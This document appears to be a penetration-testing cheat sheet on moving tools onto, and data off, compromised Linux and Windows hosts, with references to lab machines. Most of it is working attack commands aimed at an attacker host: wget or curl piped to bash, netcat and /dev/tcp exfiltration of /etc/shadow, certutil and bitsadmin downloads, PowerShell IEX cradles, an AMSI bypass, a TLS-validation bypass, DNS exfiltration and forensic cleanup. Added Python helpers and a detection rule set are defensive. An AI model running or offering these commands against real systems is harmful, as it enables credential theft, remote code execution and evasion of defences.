
File Transfer Methods

# Overview

Moving tools and payloads onto a compromised target, and pulling data back off it, is a fundamental post-exploitation operation. Which technique fits depends on the scenario: firewall restrictions, the tools available on the target, and file size. Always have several methods ready -- the first one may be blocked.

# Prerequisites

  • Shell on target system
  • Attacker machine with web server, SMB server, or netcat listener
  • Knowledge of the target's egress firewall rules and of which transfer tools (curl, certutil, PowerShell, netcat, ...) are present on it

# Exploitation / Execution

# Linux: wget and curl

```bash
# wget (most common)
wget http://10.10.14.5/linpeas.sh
wget http://10.10.14.5/chisel -O /tmp/chisel

# curl
curl http://10.10.14.5/linpeas.sh -o linpeas.sh
curl -s http://10.10.14.5/linpeas.sh | bash   # Download and execute in one line (nothing written to disk)
```

# Linux: Netcat File Transfer

```bash
# On attack box (sender):
nc -lvnp 4444 < linpeas.sh

# On target (receiver):
nc 10.10.14.5 4444 > linpeas.sh
# nc carries no end-of-file marker: Ctrl-C once the file stops growing, or run the
# sender with -q 1 (OpenBSD/Debian nc) or -N (Ncat) so it closes the socket after EOF.
# Compare sha256sum on both ends before trusting the copy.

# Reverse direction (exfiltration):
# On attack box (receiver):
nc -lvnp 4444 > exfiltrated_file.txt
# On target (sender):
nc 10.10.14.5 4444 < /etc/shadow
```

# Linux: /dev/tcp (Pure Bash)

```bash
# Requires bash built with /dev/tcp support (most distribution builds are; dash/sh lack it)
# Download:
exec 3<>/dev/tcp/10.10.14.5/80
echo -e "GET /linpeas.sh HTTP/1.0\r\n\r\n" >&3
# The socket returns the HTTP status line and headers before the body; drop everything
# up to the first blank line, otherwise the headers end up at the top of the saved file
cat <&3 | sed '1,/^\r$/d' > linpeas.sh

# Exfiltrate:
cat /etc/shadow > /dev/tcp/10.10.14.5/4444
```
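The /dev/tcp recipe above reads raw bytes off the socket, so what lands in the file is exactly what the server sent: status line, headers, then the body. As an added illustration (not code from the page), the following Python splits a captured HTTP/1.0 response the way the download needs, separates headers from body on either CRLF or bare-LF line endings, and refuses a short read by checking the body against Content-Length. The response bytes are constructed to look like what python3 -m http.server returns; the function names are this example's own.

```python
# Constructed sample of what the raw socket in the /dev/tcp recipe returns:
# status line and headers (as python3 -m http.server sends them), then the body.
SAMPLE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: SimpleHTTP/0.6 Python/3.11.2\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 12\r\n"
    b"\r\n"
    b"#!/bin/bash\n"
)


def split_http_response(raw: bytes):
    """Separate a raw HTTP/1.0 response into (status_line, headers, body).

    Accepts CRLF or bare-LF header terminators; whichever comes first marks
    the end of the headers, so a binary body that happens to contain either
    sequence is not mis-split. Raises ValueError if the header block never ends.
    """
    found = [(raw.find(sep), sep) for sep in (b"\r\n\r\n", b"\n\n")]
    found = [(i, sep) for i, sep in found if i != -1]
    if not found:
        raise ValueError("no end-of-headers marker: response is truncated or not HTTP")
    idx, sep = min(found)
    head, body = raw[:idx], raw[idx + len(sep):]
    lines = head.decode("iso-8859-1").splitlines()
    status_line = lines[0]
    if not status_line.startswith("HTTP/"):
        raise ValueError(f"not an HTTP status line: {status_line!r}")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status_line, headers, body


def status_code(status_line: str) -> int:
    """Numeric code from a status line such as 'HTTP/1.0 200 OK'."""
    return int(status_line.split()[1])


def body_is_complete(headers: dict, body: bytes) -> bool:
    """True when Content-Length is absent (an HTTP/1.0 server may end the body
    by closing the connection) or when the body length matches it exactly."""
    if "content-length" not in headers:
        return True
    return len(body) == int(headers["content-length"])


def extract_file(raw: bytes) -> bytes:
    """What 'cat <&3 > file' should have saved: the body only, and only if the
    server answered 200 and delivered every byte it promised."""
    status_line, headers, body = split_http_response(raw)
    if status_code(status_line) != 200:
        raise ValueError(f"server answered {status_line}")
    if not body_is_complete(headers, body):
        raise ValueError(f"short read: got {len(body)} of {headers['content-length']} bytes")
    return body


if __name__ == "__main__":
    print(extract_file(SAMPLE_RESPONSE).decode())
```

Dropping the header block is what a shell filter such as sed '1,/^\r$/d' does; the Content-Length comparison is the extra check that turns a connection cut mid-transfer into an error instead of a silently truncated file.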

# Linux: Base64 Encoding

```bash
# For small files when no network transfer is possible
# On target:
base64 -w 0 secret.txt    # -w 0 disables line wrapping: one string to copy
# Copy the base64 output manually

# On attacker:
echo "<BASE64_STRING>" | base64 -d > secret.txt
```

# Windows: certutil.exe

```cmd
rem The Swiss Army knife of Windows file transfer
certutil -urlcache -f http://10.10.14.5/nc64.exe C:\Windows\Temp\nc64.exe
certutil -urlcache -f http://10.10.14.5/chisel.exe c:\windows\temp\chisel.exe
rem -split with no output path saves the file under its URL basename in the current directory
certutil -urlcache -split -f http://10.10.14.5/payload.exe
```

# Windows: bitsadmin

```cmd
rem BITSAdmin (Background Intelligent Transfer Service)
bitsadmin /transfer myJob /download /priority high http://10.10.14.5/nc64.exe C:\Windows\Temp\nc64.exe
```

# Windows: PowerShell Web Client

```powershell
# Invoke-WebRequest (IWR) -- PowerShell 3+
Invoke-WebRequest -Uri http://10.10.14.5/nc64.exe -OutFile C:\Windows\Temp\nc64.exe
iwr http://10.10.14.5/nc64.exe -outfile nc64.exe

# Invoke-RestMethod (IRM)
Invoke-RestMethod -Uri http://10.10.14.5/nc64.exe -OutFile C:\Windows\Temp\nc64.exe

# .NET WebClient (available on every PowerShell version)
(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/nc64.exe','C:\Windows\Temp\nc64.exe')
(New-Object Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1') | IEX

# PowerShell 2.0 compatible
$webclient = New-Object System.Net.WebClient
$webclient.DownloadFile("http://10.10.14.5/nc64.exe","C:\Windows\Temp\nc64.exe")
```

# Windows: Base64 Encoding/Decoding

```powershell
# Encode file (ToBase64String emits one unbroken line, like base64 -w 0)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\path\to\file"))
# Decode on the Linux attack box:
#   echo <BASE64> | base64 -d > file

# Decode on Windows
[IO.File]::WriteAllBytes("C:\Windows\Temp\file.exe", [Convert]::FromBase64String("<BASE64>"))

# Certificate-style base64 (PEM header/footer, 64-character lines)
certutil -encode payload.exe payload.b64
certutil -decode payload.b64 payload.exe
# Linux "base64 -d" rejects the -----BEGIN/END CERTIFICATE----- lines; strip them before decoding there
```

Real example from Access: DPAPI credential files and masterkeys were exfiltrated via base64 encoding:

```powershell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\security\AppData\Roaming\Microsoft\Credentials\51AB..."))
```
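Both base64 sections above (the Linux base64 -w 0 / base64 -d pair and the Windows [Convert] / certutil -encode pair) move the same bytes in two different text shapes, and the manual copy/paste in between is where bytes get lost. The Python below is an added example, not code from the page: it produces both shapes, decodes either one, and performs the check a practitioner wants after a paste, comparing the SHA-256 reported by the sending side with the hash of what was decoded. The sample payload bytes are constructed and the function names are this example's own.

```python
import base64
import hashlib
import re

# Constructed sample payload (not a real binary): the kind of small file the
# page says base64 transfer is suited to.
SAMPLE_FILE = b"MZ\x90\x00" + bytes(range(256)) * 2

# Header/footer lines that certutil -encode wraps around the data.
PEM_LINE = re.compile(r"^-----(BEGIN|END) [A-Z ]+-----$")


def encode_raw(data: bytes) -> str:
    """Same shape as 'base64 -w 0' or [Convert]::ToBase64String: one unbroken line."""
    return base64.b64encode(data).decode("ascii")


def encode_certutil_style(data: bytes) -> str:
    """Same shape as 'certutil -encode': PEM header/footer, 64-char lines, CRLF endings."""
    body = base64.b64encode(data).decode("ascii")
    lines = [body[i:i + 64] for i in range(0, len(body), 64)]
    return "\r\n".join(["-----BEGIN CERTIFICATE-----", *lines, "-----END CERTIFICATE-----"]) + "\r\n"


def decode_any(text: str) -> bytes:
    """Decode either shape: drop PEM header/footer lines, join the rest, restore
    '=' padding lost in a sloppy paste, then decode strictly so a corrupted paste
    fails loudly (binascii.Error, a ValueError) instead of yielding a broken file."""
    lines = [ln.strip() for ln in text.splitlines()]
    body = "".join(ln for ln in lines if ln and not PEM_LINE.match(ln))
    body += "=" * (-len(body) % 4)
    return base64.b64decode(body, validate=True)


def sha256_hex(data: bytes) -> str:
    """Hash the sender computes on the original and reports alongside the text."""
    return hashlib.sha256(data).hexdigest()


def transfer_ok(sender_hash: str, received_text: str) -> bool:
    """Receiving-side check: decode what was pasted and compare with the sender's hash."""
    try:
        return sha256_hex(decode_any(received_text)) == sender_hash
    except ValueError:
        return False


if __name__ == "__main__":
    digest = sha256_hex(SAMPLE_FILE)
    print("raw line ok:     ", transfer_ok(digest, encode_raw(SAMPLE_FILE)))
    print("certutil style ok:", transfer_ok(digest, encode_certutil_style(SAMPLE_FILE)))
    print("truncated paste: ", transfer_ok(digest, encode_raw(SAMPLE_FILE)[:-8]))
```

The strict decode matters: a truncated paste whose length still happens to be a multiple of four decodes without error, so only the hash comparison catches it.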

# Hosting Files (Attacker Side)

Python HTTP Server (most common):

```bash
python3 -m http.server 80   # Serves current directory (port 80 needs root)
python3 -m http.server 8000 # On alternative port
python -m SimpleHTTPServer 80  # Python 2
```

Impacket SMB Server (useful when HTTP is blocked):

```bash
# Host files via SMB share
impacket-smbserver -smb2support share ./
# On Windows target:
copy \\10.10.14.5\share\nc64.exe C:\Windows\Temp\nc64.exe
```

Quick nginx/apache:

```bash
# If you need specific headers or authentication
nginx -c /dev/shm/nginx.conf  # Custom minimal nginx config
```

FTP Server:

```bash
# Python pyftpdlib (-w allows anonymous write, for exfiltration uploads)
python3 -m pyftpdlib -p 21 -w
# On target: ftp 10.10.14.5
```

# SCP/SFTP (From Attacker to Linux Target)

```bash
# Upload
scp linpeas.sh user@target:/tmp/
# Download
scp user@target:/etc/shadow ./

# sftp interactive
sftp user@target
put linpeas.sh
get /etc/shadow
```

# Evil-WinRM Upload/Download

```powershell
# From Evil-WinRM session:
upload SharpHound.exe         # Upload from current dir to C:\Windows\Temp\
download 2024_BloodHound.zip # Download file from target

# Specify custom destination:
upload SharpHound.exe C:\Users\Public\sh.exe
```

# Netcat File Transfer (Windows)

```cmd
rem On attacker:
nc -lvnp 4444 < PowerUp.ps1

rem On Windows target (with nc64.exe):
nc64.exe 10.10.14.5 4444 > PowerUp.ps1
```

# PowerShell DownloadString Cradle (Inline Execution)

```powershell
# Classic download cradle (no file written to disk)
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/PowerView.ps1')

# PowerShell 3+ simplified
iex (iwr http://10.10.14.5/PowerView.ps1 -usebasicparsing).Content

# From memory, bypassing disk write entirely
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Invoke-PowerShellTcpOneLine.ps1')"
```

# VBScript/JS Download Cradles (Older Windows)

```cmd
rem wget.vbs is a small VBScript download helper (not reproduced on this page)
cscript wget.vbs http://10.10.14.5/payload.exe C:\temp\payload.exe
```

# RDP Clipboard and Drive Redirection

```bash
# Drive redirection during RDP:
xfreerdp /v:target /u:Administrator /p:Password /drive:share,./tools/
# Shared drive appears as \\tsclient\share on the target
```

# Combined AMSI Bypass + Download Cradle

```powershell
# Professional workflow: AMSI bypass + download cradle on one line (the TLS bypass is shown separately below)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/PowerView.ps1')
```

# TLS Certificate Validation Bypass

```powershell
# Bypass TLS certificate validation for self-signed HTTPS servers
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX(New-Object Net.WebClient).DownloadString('https://10.10.14.5/script.ps1')
```

# evil-winrm Additional Flags

```bash
evil-winrm -i 10.10.10.10 -u user -p pass -s /opt/scripts   # Auto-load scripts
evil-winrm -i 10.10.10.10 -u user -p pass -e /opt/exts      # Auto-load extensions
evil-winrm -i 10.10.10.10 -u user -p pass -S                # SSL connection
evil-winrm -i 10.10.10.10 -u user -p pass --timeout 30      # Longer timeout
```

# Additional Transfer Methods

```powershell
# certutil cache clearing (OPSEC cleanup):
certutil -urlcache * delete

# iwr with UseBasicParsing (needed when Internet Explorer first-run setup has never completed on the host):
iwr -UseBasicParsing http://10.10.14.5/tool.exe -o tool.exe
```

```bash
# DNS exfiltration for restricted egress:
dnscat2 --host 10.10.14.5 --secret secretkey    # dnscat2 DNS tunnel
python3 dnsteal.py 10.10.14.5                    # DNS data exfiltration

# dev-tunnels/ngrok for when direct connectivity is blocked:
ngrok tcp 4444                                   # Expose local port via ngrok
```

# Common Pitfalls

  • certutil: Some Windows builds have certutil removed or blocked by AppLocker.
  • bitsadmin: Jobs can be stuck; use bitsadmin /reset to clear stuck jobs.
  • Python HTTP server: Only serves the directory it's started in; files outside are inaccessible.
  • IWR: PowerShell 2.0 does not have IWR; use .NET WebClient for compatibility.
  • Base64 encoding: Large files produce enormous base64 strings; only suitable for small files (<1MB).
  • PowerShell execution policy: downloaded .ps1 scripts will not run under the default policy; start PowerShell with -ExecutionPolicy Bypass or -ep bypass.
  • SMB to attacker: Windows Defender may block connections to non-domain SMB shares.

# OPSEC Considerations

  • Python HTTP server on port 80 is the most common and least suspicious.
  • certutil -urlcache leaves an entry in the URL cache; clear with certutil -urlcache * delete.
  • BITS transfers are logged in Microsoft-Windows-Bits-Client/Operational event log.
  • Disk writes of tools are forensic artifacts; prefer memory-only execution when possible.
  • Base64 transfer is slow and noisy in command logs but bypasses network controls.
  • Impacket smbserver uses SMB over port 445 which may be monitored.
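Seen from the defender's side, every technique on this page leaves a command line, and the OPSEC notes above name the artefacts (certutil URL cache, BITS client log, disk writes). The following added Python (not from the page) runs a small set of command-line rules over constructed process-creation records shaped like Sysmon Event ID 1 fields, flags the certutil -urlcache, bitsadmin /transfer, WebClient download, IWR -OutFile, IEX cradle and TLS-validation-disable patterns listed on this page, and pulls out the remote URL for blocking or enrichment. Rule names, hostnames and sample command lines are this example's own construction; two benign certutil and PowerShell lines are included to show the rules do not fire on ordinary use.

```python
import re
from typing import Dict, List

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# Not real telemetry; the command lines mirror the techniques on this page.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil -urlcache -split -f http://10.10.14.5/payload.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer myJob /download /priority high http://10.10.14.5/nc64.exe C:\Windows\Temp\nc64.exe"},
    {"host": "WS02", "image": POWERSHELL,
     "cmd": "powershell -c \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/x.ps1')\""},
    {"host": "WS02", "image": POWERSHELL,
     "cmd": "powershell -ep bypass -c \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\""},
    {"host": "WS03", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -verify C:\temp\cert.cer"},          # benign certutil use
    {"host": "WS03", "image": POWERSHELL, "cmd": "powershell -c Get-Process"},  # benign
]

# Rule names are this example's own labels. Each pattern keys on a command-line
# fragment the page itself lists as a transfer or cradle technique.
RULES = [
    ("certutil_urlcache_download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("certutil_base64_decode", re.compile(r"\bcertutil(\.exe)?\b.*-decode", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer", re.I)),
    ("webclient_download", re.compile(r"Net\.WebClient.*Download(String|File)", re.I)),
    ("iwr_outfile", re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b.*\s-o(utfile)?\b", re.I)),
    ("tls_validation_disabled", re.compile(r"ServerCertificateValidationCallback", re.I)),
    ("inline_iex_cradle", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
]
URL = re.compile(r"https?://[^\s'\"]+")


def classify(cmd: str) -> List[str]:
    """Names of every rule whose pattern occurs in the command line, in rule order."""
    return [name for name, rx in RULES if rx.search(cmd)]


def extract_urls(cmd: str) -> List[str]:
    """Remote locations referenced by the command line, for enrichment or blocking."""
    return URL.findall(cmd)


def scan(events: List[Dict]) -> List[Dict]:
    """One finding per event that matched at least one rule; benign events are dropped."""
    findings = []
    for ev in events:
        rules = classify(ev["cmd"])
        if rules:
            findings.append({"host": ev["host"], "image": ev["image"],
                             "rules": rules, "urls": extract_urls(ev["cmd"])})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']}: {', '.join(f['rules'])} {f['urls']}")
```

Command-line rules only see what went through a process launch; pair them with the Microsoft-Windows-Bits-Client/Operational log the OPSEC list mentions, since a BITS job created through PowerShell or the COM API leaves no bitsadmin.exe command line at all.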

# Post-Exploitation Value

File transfer enables uploading of enumeration tools (linpeas, WinPEAS, SharpHound), exploitation payloads (MSFvenom stagers, exploit binaries), credential dumping tools (Mimikatz, procdump), and tunnel clients (chisel, ligolo-agent). It also enables exfiltration of sensitive data (SAM/SYSTEM files, NTDS.dit, database files, browser credential stores).

# Cross-References

# Tool References

| Tool | Link |
|---|---|
| Netcat (nc64.exe for Windows) | https://github.com/int0x33/nc.exe |
| Impacket | https://github.com/fortra/impacket |
| Nishang | https://github.com/samratashok/nishang |

# Source Machines

  • Cerberus (Hard, Linux) - python3 -m http.server 8000 for payload hosting, wget on target
  • Cereal (Hard, Windows) - wget + python3 -m http.server 80 for webshell upload, iwr for chisel
  • Help (Easy, Linux) - wget + python3 -m http.server 80 for kernel exploit transfer
  • Support (Easy, Windows) - Evil-WinRM upload SharpHound.exe, upload PowerView.ps1
  • StreamIO (Medium, Windows) - curl from PHP RFI to upload nc64.exe, Evil-WinRM upload/download
  • Access (Easy, Windows) - PowerShell download cradle with START /B for background execution